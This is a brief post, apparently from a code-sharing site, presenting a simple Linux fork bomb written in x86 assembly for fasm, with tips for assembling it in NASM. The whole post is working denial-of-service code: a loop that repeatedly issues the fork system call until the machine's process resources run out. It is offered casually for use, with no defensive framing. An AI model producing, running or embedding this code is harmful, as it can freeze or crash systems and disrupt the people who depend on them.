|
Description
simple fork bomb for Linux
It calls the system call SYS_FORK (2) and loops around. Basic shit. I used fasm for this code, but it can be assembled with NASM as well, you just need to replace the first 2 lines and change 'start' to '_start'.
;assembly with fasm ;fasm fork.asm format ELF executable entry start start: push 0x2 pop eax int 0x80 jmp start |
|